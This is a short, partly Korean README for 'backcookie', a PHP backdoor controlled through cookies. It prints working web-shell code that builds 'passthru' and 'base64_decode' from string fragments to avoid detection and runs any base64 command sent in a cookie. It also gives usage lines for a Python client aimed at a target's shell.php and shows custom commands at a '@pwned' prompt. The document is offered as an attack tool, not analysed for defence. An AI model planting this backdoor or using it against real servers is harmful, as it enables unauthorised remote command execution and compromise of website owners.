
쿠키를 이용한 소형 백도어.
쿠키를 이용한 작은 백도어.
==========
<?php
# the code of the backdoor used
$bOne = "pa"."ss"."th"."ru";
$bTwo = "ba"."se"."64"."_"."de"."co"."de";
$bKey = "yourcookie"; # conection backdoor
$bOne($bTwo($_COOKIE[$bKey]));
?>
Example one: python backcookie.py -u http://target.com/shell.php -c name_cookie
Example two: python backcookie.py --url http://target.com/shell.php --cookie name_cookie
사용자 정의 명령(binfo), 객관적인 정보를 얻을 수 있습니다.
@pwned:~$ binfo
사용자 정의 명령(exit), 종료하려면.
@pwned:~$ exit
저작권, 2013 - 2016, Jose Pino